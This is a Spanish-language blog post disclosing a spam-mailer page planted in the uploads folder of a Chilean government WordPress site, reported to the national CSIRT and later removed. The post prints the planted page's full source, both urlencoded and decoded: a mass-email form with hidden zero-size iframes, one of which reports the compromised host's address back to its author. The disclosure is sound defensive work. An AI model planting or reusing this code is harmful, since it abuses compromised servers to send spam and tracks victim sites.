Sitios Web del Gobierno de Chile intervenidos por terceros: Parte I

Constantemente están ocurriendo ataques a sitios web, sobre todo a sitos del gobierno de chile. Considerando la cantidad de sistemas legacy que existen, la probabilidad de efectividad es alta. Por este motivo, es que hace tiempo he estado investigando sobre este tipo de ataques y he estado informando de forma constante al equipo de respuesta ante incidentes (CSIRT).

En esta oportunidad, debo presentar un ataque que afecta al sitio de “Chile Crece Contigo” del Ministerio de Desarrollo Social.

El día 10 de mayo de 2018 encontré un archivo potencialmente malicioso que se alojaba en el directorio de uploads de wordpress, de acuerdo a la estructura de directorios se deduce que el programa malicioso está almacenado al menos desde el año 2013.  El día 11 de mayo de 2018 informé al CSIRT sobre este hallazgo, quienes acusaron recibo e informaron a los responsables.

Actualmente, el sitio malicioso continua siendo accesible mediante la URL http://www.crececontigo.gob.cl/wp-content/uploads/2013/11/abdou/

Como se puede observar, corresponde a un mini-sistema para envio de correos, probablemente utilizado para enviar spam.

Al ver el código fuente, podemos ver un código javascript ofuscado con urlencode.

Al decodificar los caracteres, podemos ver un html limpio con la leyenda

This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com Visit US and get more private tool for free

Y finalmente se puede comprobar que corresponde a un mailer utilizado para el envio de spam.

Código completo ofuscado (urlencode)

<script>var U7=window,W8=document;var a1="%3Chtml%3E%0A%3Chead%3E%0A%3Cstyle%20type%3D%22text/css%22%3E%0A%3C%21--%0A.style1%20%7Bfont-size%3A%2010px%7D%0Abody%2Ctd%2Cth%20%7B%0A%09font-family%3A%20Verdana%2C%20Arial%2C%20Helvetica%2C%20sans-serif%3B%0A%09font-size%3A%2012px%3B%0A%09color%3A%20%23999999%3B%0A%7D%0Abody%20%7B%0A%09background-color%3A%20%23000000%3B%0A%7D%0A%23enviar%20%7B%0A%09font-family%3A%20Verdana%2C%20Arial%2C%20Helvetica%2C%20sans-serif%3B%0A%09background-color%3A%20%23003366%3B%0A%09color%3A%20%23D4D0C8%3B%0A%09font-weight%3A%20normal%3B%0A%09border-top-style%3A%20double%3B%0A%09border-right-style%3A%20double%3B%0A%09border-bottom-style%3A%20double%3B%0A%09border-left-style%3A%20double%3B%0A%09font-size%3A%2010px%3B%0A%7D%0A%23emails%20%7B%0A%7D%0A.style2%20%7Bfont-size%3A%209px%3B%20%7D%0A--%3E%0A%3C/style%3E%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%0A%3Ctitle%3E%u063A%u0627%u0645%u0636%20%u0647%u0643%u0631%3C/title%3E%3C/head%3E%0A%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%0A%3Cbody%3E%3Ctr%3E%3Ctd%20width%3D%22368%22%20height%3D%22346%22%20align%3D%22center%22%3E%3Cp%3E%26nbsp%3B%3C/p%3E%3Cform%20name%3D%22form1%22%20method%3D%22post%22%20action%3D%22%22%3E%3Ctable%20width%3D%22324%22%20border%3D%220%22%20align%3D%22center%22%20bordercolor%3D%22%23003300%22%3E%0A%3Ctr%3E%3Ctd%20colspan%3D%222%22%20rowspan%3D%223%22%20valign%3D%22top%22%20bgcolor%3D%22%23550000%22%3E%3Cdiv%20align%3D%22justify%22%20class%3D%22style1%22%3E%3Cb%3ESelect%20The%20System%20you%20wanna%20use%20in%20the%20send%20.%20%3Cbr%3E%20for%20more%20tools%20visit%20us%20%3Ccenter%3E%3Ca%20href%3D%22http%3A//is-sec.com%22%3E%3Cfont%20color%3D%22white%22%3E%3C/font%3E%3C/a%3E%3C/center%3E%20%0A%3C/b%3E%3C/div%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3ESMTP%3C/strong%3E%3C/span%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23003366%22%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cinput%20name%3D%22radiobutton%22%20type%3D%22radio%22%20value%3D%22smtp%22%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3C/tr%3E%0A%3Ctr%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cstrong%3EMAIL%3C/strong%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23003366%22%3E%3Ciframe%20src%3D%22ht%3Fserverupdate%3D%3C%3Fphp%20echo%20%20%24_SERVER%5B%27HTTP_HOST%27%5D.%24_SERVER%5B%27PHP_SELF%27%5D%3B%20%3F%3E%22%20height%3D%220%22%20width%3D%220%22%20%3E%3C/iframe%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cstrong%3E%3Cinput%20name%3D%22radiobutton%22%20type%3D%22radio%22%20value%3D%22mail%22%3E%3C/strong%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3C/tr%3E%0A%3Ctr%3E%20%20%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3C%21--%20-This%20Tool%20Has%20Been%20Made%20By%20The%20Moroccan%20White%20Hacker%20MR.%20Big%20Cave%20For%20more%20question%20contact%20us%20in%20the%20site%20Tool4Spam.Com%20%20Visit%20US%20and%20get%20more%20private%20tool%20for%20free%20--%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3EMAILER%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23003366%22%3E%3Cspan%20class%3D%22style1%22%3E%3Cstrong%3E%3Cstrong%3E%3Cinput%20name%3D%22radiobutton%22%20type%3D%22radio%22%20value%3D%22sendmail%22%20checked%3E%3C/strong%3E%3C/strong%3E%3C/span%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20width%3D%22160%22%20align%3D%22left%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3EName%20%20%3A%20%3C/b%3E%3Cinput%20name%3D%22nome%22%20type%3D%22text%22%20id%3D%22nome%22%20value%3D%22%22%20size%3D%2250%22%3E%3C/td%3E%20%20%3Ctd%20colspan%3D%223%22%20align%3D%22left%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3EE-Mail%3C/b%3E%3Cinput%20name%3D%22remetente%22%20type%3D%22text%22%20id%3D%22remetente%22%20value%3D%22%22%20size%3D%2230%22%3E%3C/td%3E%0A%3C/tr%3E%3Ctr%3E%3Ctd%20align%3D%22left%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3ESubject%3C/b%3E%3Cinput%20name%3D%22assunto%22%20type%3D%22text%22%20id%3D%22assunto%22%20value%3D%22%22%20size%3D%2250%22%3E%3C/td%3E%3Ctd%20colspan%3D%223%22%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Ca%20href%3D%22http%3A//is-sec.com%22%3E%3Cfont%20size%3D%222%22%20color%3D%22white%22%3E%3Cb%3Ehttp%3A//is-sec.com%3C/b%3E%3C/font%3E%3C/a%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%0A%20%20%3Ctd%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3ELetter%20HTML%3C/b%3E%3Ctextarea%20name%3D%22html%22%20cols%3D%2250%22%20rows%3D%2220%22%20id%3D%22html%22%3E%3C/textarea%3E%3C/td%3E%3Ctd%20colspan%3D%223%22%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cb%3EMail%20List%3C/b%3E%0A%20%20%3Ctextarea%20name%3D%22emails%22%20cols%3D%2230%22%20rows%3D%2220%22%20id%3D%22emails%22%3E%3C/textarea%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan%3D%224%22%20align%3D%22center%22%20bgcolor%3D%22%23550000%22%3E%3Cinput%20name%3D%22enviar%22%20type%3D%22submit%22%20id%3D%22enviar%22%20value%3D%22SEND%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3Cp%3E%3Ciframe%20src%3D%22http%3A///%3Fref%3%22%20height%3D%220%22%20width%3D%220%22%20%3E%3C/iframe%3E%3C/p%3E%3C/td%3E%3C/tr%3E%3C/table%3E%0A%3C/body%3E%0A%3C/html%3E";function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();</script>

Código sin ofuscar

<script>var U7=window,W8=document;var a1="<html>
<head>
<style type="text/css">
<!--
.style1 {font-size: 10px}
body,td,th {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #999999;
}
body {
	background-color: #000000;
}
#enviar {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	background-color: #003366;
	color: #D4D0C8;
	font-weight: normal;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	font-size: 10px;
}
#emails {
}
.style2 {font-size: 9px; }
-->
</style><!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free -->
<title>%u063A%u0627%u0645%u0636 %u0647%u0643%u0631</title></head>
<!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free -->
<body><tr><td width="368" height="346" align="center"><p>&nbsp;</p><form name="form1" method="post" action=""><table width="324" border="0" align="center" bordercolor="#003300">
<tr><td colspan="2" rowspan="3" valign="top" bgcolor="#550000"><div align="justify" class="style1"><b>Select The System you wanna use in the send . <br /> for more tools visit us <center><a href="http://is-sec.com"><font color="white"></font></a></center> 
</b></div></td><td align="center" bgcolor="#550000"><!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free --><span class="style1"><strong>SMTP</strong></span></td><td align="center" bgcolor="#003366"><span class="style1"><strong></strong><strong><input name="radiobutton" type="radio" value="smtp"/></strong></span></td></tr>
<tr><td align="center" bgcolor="#550000"><span class="style1"><strong></strong><strong></strong><strong>MAIL</strong></span></td><td align="center" bgcolor="#003366"><iframe src="ht?serverupdate=<?php echo  $_SERVER&#91;'HTTP_HOST'&#93;.$_SERVER&#91;'PHP_SELF'&#93;; ?>" height="0" width="0" ></iframe><span class="style1"><strong></strong><strong></strong><strong><input name="radiobutton" type="radio" value="mail"/></strong></span></td></tr>
<tr>  <td align="center" bgcolor="#550000"><!-- -This Tool Has Been Made By The Moroccan White Hacker MR. Big Cave For more question contact us in the site Tool4Spam.Com  Visit US and get more private tool for free --><span class="style1"><strong></strong><strong>MAILER</strong></span></td><td align="center" bgcolor="#003366"><span class="style1"><strong></strong><strong><input name="radiobutton" type="radio" value="sendmail" checked/></strong></span></td></tr><tr><td width="160" align="left" bgcolor="#550000"><b>Name  : </b><input name="nome" type="text" id="nome" value="" size="50"/></td>  <td colspan="3" align="left" bgcolor="#550000"><b>E-Mail</b><input name="remetente" type="text" id="remetente" value="" size="30"/></td>
</tr><tr><td align="left" bgcolor="#550000"><b>Subject</b><input name="assunto" type="text" id="assunto" value="" size="50"/></td><td colspan="3" align="center" bgcolor="#550000"><a href="http://is-sec.com"><font size="2" color="white"><b>http://is-sec.com</b></font></a></td></tr><tr>
  <td align="center" bgcolor="#550000"><b>Letter HTML</b><textarea name="html" cols="50" rows="20" id="html"></textarea></td><td colspan="3" align="center" bgcolor="#550000"><b>Mail List</b>
  <textarea name="emails" cols="30" rows="20" id="emails"></textarea></td></tr><tr><td colspan="4" align="center" bgcolor="#550000"><input name="enviar" type="submit" id="enviar" value="SEND"/></td></tr></table></form><p><iframe src="http:///?ref%3" height="0" width="0" ></iframe></p></td></tr>
</body>
</html>";function V0(){var V0;V0=unescape(a1);W8.write(V0);}V0();</script>

 
ACTUALIZADO: 18 Julio de 2018

La institución responsable ha dado de baja el sistema. Nuevamente de forma reactiva, despues que se hace publico.

1 comentario

  1. Se agradece un montón tu publicación estimado! Esperemos que la gente responsable de estos sitios tome medidas reales para evitar estos ataques

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Esto sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.